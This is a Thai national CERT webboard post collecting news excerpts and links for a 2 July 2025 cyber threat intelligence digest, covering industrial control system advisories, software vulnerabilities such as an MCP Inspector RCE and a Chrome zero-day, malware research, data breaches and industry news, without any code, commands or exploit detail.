NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 02 July 2025

    Cyber Security News
    1
    1
    661
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Energy Sector

      • Protecting The Core: Securing Protection Relays In Modern Substations
        "Substations are critical nexus points in the power grid, transforming high-voltage electricity to ensure its safe and efficient delivery from power plants to millions of end-users. At the core of a modern substation lies the protection relay: an intelligent electronic device (IED) that plays a critical role in maintaining the stability of the power grid by continuously monitoring voltage, current, frequency, and phase angle. Upon detecting a fault, it instantly isolates the affected zone by tripping circuit breakers, thus preventing equipment damage, fire hazards, and cascading power outages."
        https://cloud.google.com/blog/topics/threat-intelligence/securing-protection-relays-modern-substations

      Industrial Sector

      • FESTO Didactic CP, MPS 200, And MPS 400 Firmware
        "Successful exploitation of this vulnerability could allow an attacker to write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-01
      • FESTO Automation Suite, FluidDraw, And Festo Didactic Products
        "Successful exploitation of these vulnerabilities could allow an attacker to gain full control of the host system, including remote code execution."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-02
      • FESTO CODESYS
        "Successful exploitation of these vulnerabilities could allow an attacker to block legitimate user connections, crash the application, or authenticate without proper credentials."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-03
      • FESTO Hardware Controller, Hardware Servo Press Kit
        "Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized system commands with root privileges."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-04
      • Voltronic Power And PowerShield UPS Monitoring Software
        "Successful exploitation of these vulnerabilities could allow an unauthenticated attacker remotely to make configuration changes, resulting in shutting down UPS connected devices or execution of arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-05
      • Hitachi Energy Relion 670/650 And SAM600-IO Series
        "Successful exploitation of this vulnerability could allow attackers to cause a denial-of-service that disrupts critical functions in the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-06
      • Hitachi Energy MSM
        "Successful exploitation of this vulnerability could allow attackers to execute untrusted code, potentially leading to unauthorized actions or system compromise."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07

      Vulnerabilities

      • Critical RCE Vulnerability In Anthropic MCP Inspector - CVE-2025-49596
        "Oligo Security Research reported a Remote Code Execution (RCE) vulnerability and DNS rebinding in the MCP Inspector project to Anthropic, leading to CVE-2025-49596 being issued, with a Critical CVSS Score of 9.4. This is one of the first critical RCEs in Anthropic’s MCP ecosystem, exposing a new class of browser-based attacks against AI developer tools. With code execution on a developer’s machine, attackers can steal data, install backdoors, and move laterally across networks - highlighting serious risks for AI teams, open-source projects, and enterprise adopters relying on MCP. When a victim visits a malicious website, the vulnerability allows attackers to run arbitrary code on the visiting host running the official MCP inspector tool that is used by default in many use cases."
        https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
        https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html
      • Chrome Zero-Day, 'FoxyWallet' Firefox Attacks Threaten Browsers
        "Both the Google Chrome and Mozilla Firefox browsers currently are under separate attacks, the former from actors exploiting a zero-day bug and the latter from a list of malicious extensions that are actively compromising users. Google rushed out a stable channel update on Monday to patch the fourth zero-day flaw found in its browser this year, a high-severity type confusion flaw tracked as CVE-2025-6554, according to a Google security advisory. The flaw, which allows attackers to execute arbitrary code, is under active exploitation and should be patched immediately. Meanwhile, 45 malicious Firefox extensions impersonating legitimate cryptocurrency wallet add-ons are targeting Mozilla Firefox users, compromising their client devices."
        https://www.darkreading.com/cyberattacks-data-breaches/browsers-targeted-chrome-zero-day-malicious-firefox-extensions
        https://www.bleepingcomputer.com/news/security/google-fixes-fourth-actively-exploited-chrome-zero-day-of-2025/
        https://thehackernews.com/2025/07/google-patches-critical-zero-day-flaw.html
        https://www.securityweek.com/chrome-138-update-patches-zero-day-vulnerability/
        https://www.helpnetsecurity.com/2025/07/01/google-patches-actively-exploited-chrome-cve-2025-6554/
        https://www.infosecurity-magazine.com/news/google-patch-chrome-zero-day/
        https://www.malwarebytes.com/blog/news/2025/07/update-your-chrome-to-fix-new-actively-exploited-zero-day-vulnerability
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-48927 TeleMessage TM SGNL Initialization of a Resource with an Insecure Default Vulnerability
        CVE-2025-48928 TeleMessage TM SGNL Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-adds-two-known-exploited-vulnerabilities-catalog
      • Sudo Local Privilege Escalation Vulnerabilities Fixed (CVE-2025-32462, CVE-2025-32463)
        "If you haven’t recently updated the Sudo utility on your Linux box(es), you should do so now, to patch two local privilege escalation vulnerabilities (CVE-2025-32462, CVE-2025-32463) that have been disclosed on Monday. Sudo is command-line utility in Unix-like operating systems that allows a low-privilege user to execute a command as another user, typically the root/administrator user. The utility effectively grants temporary elevated privileges without requiring the user to log in as root."
        https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/
      • Can You Trust That Verified Symbol? Exploiting IDE Extensions Is Easier Than It Should Be
        "Integrated Development Environments (IDEs) play a major role in today’s programming landscape. They provide comprehensive environments in which programmers can write, test, and debug code efficiently. However, OX’s research, conducted in May and June 2025, reveals critical security vulnerabilities in how popular IDEs handle extension verification. IDEs typically include basic built-in functionality, but their capabilities extend through a wide range of third-party extensions available on marketplaces and external websites. This means that any risk in the IDE could result in far-reaching consequences."
        https://www.ox.security/can-you-trust-that-verified-symbol-exploiting-ide-extensions-is-easier-than-it-should-be/
        https://thehackernews.com/2025/07/new-flaw-in-ides-like-visual-studio.html

      Malware

      • How Analyzing 700,000 Security Incidents Helped Our Understanding Of Living Off The Land Tactics
        "This article shares initial findings from internal Bitdefender Labs research into Living off the Land (LOTL) techniques. Our team at Bitdefender Labs, comprised of hundreds of security researchers with close ties to academia, conducted this analysis as foundational research during the development of our GravityZone Proactive Hardening and Attack Surface Reduction (PHASR) technology. The results reveal adversaries’ persistent and widespread use of trusted system tools in most significant security incidents. While this research was primarily for our internal development efforts, we believe these initial insights from Bitdefender Labs are valuable for broader understanding and we are sharing them now, ahead of a more comprehensive report."
        https://www.helpnetsecurity.com/2025/07/01/bitdefender-lotl-security-incidents-phasr/
      • FileFix (Part 2)
        "While analyzing Chrome & MS Edge’s behavior, I made an interesting observation. When an HTML page is saved using Ctrl+S or Right-click > “Save as” and either “Webpage, Single File” or “Webpage, Complete” types were selected, then the file downloaded does not have MOTW. Furthermore, this behaviour only applies if the webpage being saved has a MIME type of text/html or application/xhtml+xml. Other MIME types will result in the file being tagged with MOTW (e.g. image/png, image/svg+xml etc.)"
        https://mrd0x.com/filefix-part-2/
        https://www.bleepingcomputer.com/news/security/new-filefix-attack-runs-jscript-while-bypassing-windows-motw-alerts/
      • Stealthy WordPress Malware Drops Windows Trojan Via PHP Backdoor
        "Last month, we encountered a particularly interesting and complex malware case that stood out from the usual infections we see in compromised WordPress websites. At first glance, the site looked clean, no visible signs of defacement, no malicious redirects, and nothing suspicious in the plugin list. But beneath the surface, a hidden infection chain was quietly working to deliver a trojan to unsuspecting visitors. It was a layered attack involving PHP-based droppers, obfuscated code, IP-based evasion, auto-generated batch scripts, and a malicious ZIP archive containing a Windows-based trojan (client32.exe)."
        https://blog.sucuri.net/2025/06/stealthy-wordpress-malware-drops-windows-trojan-via-php-backdoor.html

      Breaches/Hacks/Leaks

      • Kelly Benefits Says 2024 Data Breach Impacts 550,000 Customers
        "Kelly & Associates Insurance Group (dba Kelly Benefits) is informing more than half a million people of a data breach that compromised their personal information. The Maryland-based health and life insurance agency has issued an update on a security incident it suffered last year between December 12-17, when unauthorized actors breached its IT systems and stole files. On April 9, 2025, the company stated that the incident impacted 32,234 individuals. The figure was revised multiple times until the final tally shared with authorities in the U.S. counted 553,660 individuals."
        https://www.bleepingcomputer.com/news/security/kelly-benefits-says-2024-data-breach-impacts-550-000-customers/
      • Esse Health Says Recent Data Breach Affects Over 263,000 Patients
        "Esse Health, a healthcare provider based in St. Louis, Missouri, is notifying over 263,000 patients that their personal and health information was stolen in an April cyberattack. As the largest independent physicians' group in the Greater St. Louis area, Esse Health operates 50 locations and employs over 100 physicians. The organization was made aware of a breach after the attackers took down some primary patient-facing network systems and its phone systems on April 21."
        https://www.bleepingcomputer.com/news/security/esse-health-says-recent-data-breach-affects-over-263-000-patients/
        https://www.securityweek.com/263000-impacted-by-esse-health-data-breach/
        https://securityaffairs.com/179520/data-breach/esse-health-data-breach-impacted-263000-individuals.html
      • Qantas Discloses Cyberattack Amid Scattered Spider Aviation Breaches
        "Australian airline Qantas disclosed that it detected a cyberattack on Monday after threat actors gained access to a third-party platform containing customer data. Qantas is Australia's largest airline, operating domestic and international flights across six continents and employing around 24,000 people. In a press release issued Monday night, the airline states that the attack has been contained, but a "significant" amount of data is believed to have been stolen. The breach began after a threat actor targeted a Qantas call centre and gained access to a third-party customer servicing platform."
        https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/
        https://www.itnews.com.au/news/qantas-facing-significant-data-theft-after-cyber-attack-618367
        https://www.theregister.com/2025/07/02/qantas_data_theft/

      General News

      • How Cybercriminals Are Weaponizing AI And What CISOs Should Do About It
        "In a recent case tracked by Flashpoint, a finance worker at a global firm joined a video call that seemed normal. By the end of it, $25 million was gone. Everyone on the call except the employee was a deepfake. Criminals had used AI-powered cybercrime tactics to impersonate executives convincingly enough to get the payment approved. Threat actors are building LLMs specifically for fraud and cybercrime. These are trained on stolen credentials, scam scripts, and hacking guides. Some generate phishing emails or fake invoices, others explain how to use malware or cash out stolen data, according to the AI and Threat Intelligence report from Flashpoint."
        https://www.helpnetsecurity.com/2025/07/01/defending-ai-powered-cybercrime/
      • GenAI Is Everywhere, But Security Policies Haven’t Caught Up
        "Nearly three out of four European IT and cybersecurity professionals say staff are already using generative AI at work, up ten points in a year, but just under a third of organizations have put formal policies in place, according to new ISACA research. The use of AI is becoming more prevalent within the workplace, and so regulating its use is best practice. Yet 31% of organizations have a formal, comprehensive AI policy in place, highlighting a disparity between how often AI is used versus how closely it’s regulated in workplaces."
        https://www.helpnetsecurity.com/2025/07/01/ai-work-policies-europe/
      • Federal Reserve System CISO On Aligning Cyber Risk Management With Transparency, Trust
        "In this Help Net Security interview, Tammy Hornsby-Fink, CISO at Federal Reserve System, shares how the Fed approaches cyber risk with a scenario-based, intelligence-driven strategy. She explains how the Fed assesses potential disruptions to financial stability and addresses third-party and cloud service risks. Hornsby-Fink also discusses how federal collaboration supports managing systemic threats and strengthens operational resilience."
        https://www.helpnetsecurity.com/2025/07/01/tammy-hornsby-fink-federal-reserve-system-cyber-risk/
      • Scam Centers Are Spreading, And So Is The Human Cost
        "Human trafficking tied to online scam centers is spreading across the globe, according to a new crime trend update from INTERPOL. By March 2025, people from 66 countries had been trafficked into these scam operations, with every continent affected. INTERPOL found that 74% of victims were taken to scam centers in Southeast Asia, the original hotspot for this type of crime. But these centers are now also showing up in other regions, including the Middle East, West Africa, which may be turning into a new hub, and Central America. Most of the traffickers, around 90%, came from Asia. Another 11% were from South America or Africa."
        https://www.helpnetsecurity.com/2025/07/01/interpol-human-trafficking-scam-centers/
        https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
      • Terrible Tales Of Opsec Oversights: How Cybercrooks Get Themselves Caught
        "They say that success breeds complacency, and complacency leads to failure. For cybercriminals, taking too many shortcuts when it comes to opsec delivers a little more than that. In these cases, failure might mean the criminal doesn't get access to the server with the most valuable data to copy, or fails to trick any of the victim org's staff members to execute a malicious remote access tool. Complacency, however, can get them caught, and all too often we hear about highly skilled individuals taking one too many shortcuts – the type that leads police to their doors."
        https://www.theregister.com/2025/07/01/terrible_tales_of_opsec_oversights/
      • Treasury Sanctions Global Bulletproof Hosting Service Enabling Cybercriminals And Technology Theft
        "Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) is designating Aeza Group, a bulletproof hosting (BPH) services provider, for its role in supporting cybercriminal activity targeting victims in the United States and around the world. BPH service providers sell access to specialized servers and other computer infrastructure designed to help cybercriminals like ransomware actors, personal information stealers, and drug vendors evade detection and resist law enforcement attempts to disrupt their malicious activities. OFAC is also designating two affiliated companies and four individuals who are Aeza Group leaders. Finally, in coordination with the United Kingdom’s (UK) National Crime Agency (NCA), OFAC is designating an Aeza Group front company in the UK."
        https://home.treasury.gov/news/press-releases/sb0185
        https://www.bleepingcomputer.com/news/security/aeza-group-sanctioned-for-hosting-ransomware-infostealer-servers/
        https://therecord.media/russia-bulletproof-hosting-aeza-group-us-sanctions
        https://www.bankinfosecurity.com/us-sanctions-aeza-group-for-hosting-infostealers-ransomware-a-28871
        https://cyberscoop.com/bulletproof-hosting-provider-aezagroup-sanctions/
      • Top Ransomware Groups June 2025: Qilin Reclaims Top Spot
        "Qilin was the top ransomware group for the second time in three months in June, suggesting that the group may be strongly benefiting from the turmoil that knocked RansomHub offline at the beginning of April. RansomHub was the top ransomware group for more than a year until rival DragonForce claimed to be taking over its infrastructure in what may have been an act of sabotage. Qilin took over the top spot in April, and after SafePay narrowly took the lead in May, Qilin returned to the top in June with a dominant showing."
        https://cyble.com/blog/top-ransomware-groups-june-2025-qilin-top-spot/
      • Like SEO, LLMs May Soon Fall Prey To Phishing Scams
        "Just as attackers have exploited search engine optimization (SEO) techniques to push phishing content in search engine results, expect to soon see them leverage AI-optimized content to influence the outputs of large language models (LLMs) for the same purpose. Making the task possible for them is the tendency by LLMs to often return incorrect domain information in response to simple natural language queries, according to a recent experiment by Netcraft."
        https://www.darkreading.com/cyber-risk/seo-llms-fall-prey-phishing-scams
      • Ransomware Reshaped How Cyber Insurers Perform Security Assessments
        "The ransomware scourge has forced cyber insurers to re-examine how they use security assessments. While the threat has been around for years, it's only fairly recently that cybercriminals realized how profitable ransomware attacks could be. As ransomware-as-a-service and double extortion tactics started to emerge, the threat landscape has shifted immensely, with more and more organizations seeing their data splashed online for all to see, acommpanied with payment countdown clocks. Cyber insurance helped organizations address the ransomware threat by providing services such as ransom reimbursement, incident response, and ransom negotiation. But that support came with a price, as policies and premiums fluctuated. In fact, insurance premiums surged in 2020 and 2021."
        https://www.darkreading.com/cybersecurity-operations/ransomware-reshaped-how-cyber-insurers-perform-security-assessments
      • We've All Been Wrong: Phishing Training Doesn't Work
        "A recent study suggests, contrary to popular belief, that most phishing awareness initiatives aren't having a material impact on employee cybersecurity. One of the most widely repeated, least examined memes in the cybersecurity industry is that, even more than technical solutions, organizations can best secure themselves by teaching cyber awareness among their employees. Building a "human firewall," to protect an organization's otherwise "weakest link.""
        https://www.darkreading.com/endpoint-security/phishing-training-doesnt-work
      • How Businesses Can Align Cyber Defenses With Real Threats
        "With escalating geopolitical tensions and highly publicized cyberattacks on critical infrastructure like Change Healthcare and Colonial Pipeline, businesses worldwide are grappling with increasingly sophisticated cybercriminal tactics. Cybercriminal groups are quickly adopting the highly complex tactics once limited to the most advanced state-backed operations. In parallel, heavily sanctioned nation-states are increasingly using ransomware and cryptocurrency scams through state backed threat actors to finance their regimes."
        https://www.darkreading.com/vulnerabilities-threats/how-businesses-can-align-cyber-defenses-real-threats
      • Crypto Hack Losses In First Half Of 2025 Exceed 2024 Total
        "Around $2.47bn in cryptocurrency has been stolen via scams, hacks and exploits in H1 2025, already exceeding the total amount lost during 2024, new data from CertiK has revealed. The surge in crypto losses in 2025 is largely the result of two major security incidents – the ByBit breach and Cetus Protocol incident. Collectively, these incidents cost $1.78bn, 72% of the total. In the ByBit incident, hackers stole $1.4bn in cryptocurrency from the Dubai-based exchange in February 2025. The notorious North Korean state actor Lazarus group is suspected of carrying out the Ethereum attack, which is the largest ever crypto theft to date."
        https://www.infosecurity-magazine.com/news/crypto-hack-losses-half-exceed-2024/
      • Cyberattack On Russian Independent Media Had Links To US-Sanctioned Institute, Researchers Find
        "A Russian hosting provider allegedly involved in a recent cyberattack against independent media organizations in the country is reportedly connected to a state-affiliated research center sanctioned by the U.S., according to new research. The hosting provider, Biterika, generated one-third of the junk traffic that flooded the websites of IStories and Verstka after they published an exposé on a child sex trafficking network in Russia that allegedly involved oligarchs and other powerful figures."
        https://therecord.media/cyberattack-on-russian-media-linked-to-sanctioned-institute
      • How To Build An Effective Security Awareness Program
        "Organizations invest in advanced tools to secure their assets, but humans are still the most persistent attack vector. Each year, this is reinforced by the overwhelming number of breaches that stem from human behaviour. Ultimately, employees are being asked to be hypervigilant all the time – despite their best efforts, everybody makes mistakes, and you can’t defend what you don’t know. By building a strong security awareness and training program, you can help your employees become your first line of defense against cyberattacks."
        https://www.trendmicro.com/en_us/research/25/f/security-awareness-program.html
      • Out-Of-Band, Part 1: The New Generation Of IP KVMs And How To Find Them
        "Welcome to the first post in Out-of-Band, a series exploring the security risks of out-of-band (OoB) management devices like baseboard management controllers, serial console servers, and IP-enabled KVMs. These tools often have weaker security than the systems they control, offering attackers a path to bypass monitoring and safeguards. In this installment, we focus on the latest wave of open-source, network-connected KVMs. We’ll cover where to find them in the wild, how to detect them via network and host signals (plus SIEM), and what their source code reveals about their security posture. Bonus: These devices have been used by North Korean threat actors to spoof in-country access. So if that’s a concern, read on."
        https://www.runzero.com/blog/oob-p1-ip-kvm/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) db824815-672e-41e2-95c6-dcd9651dbc5d-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post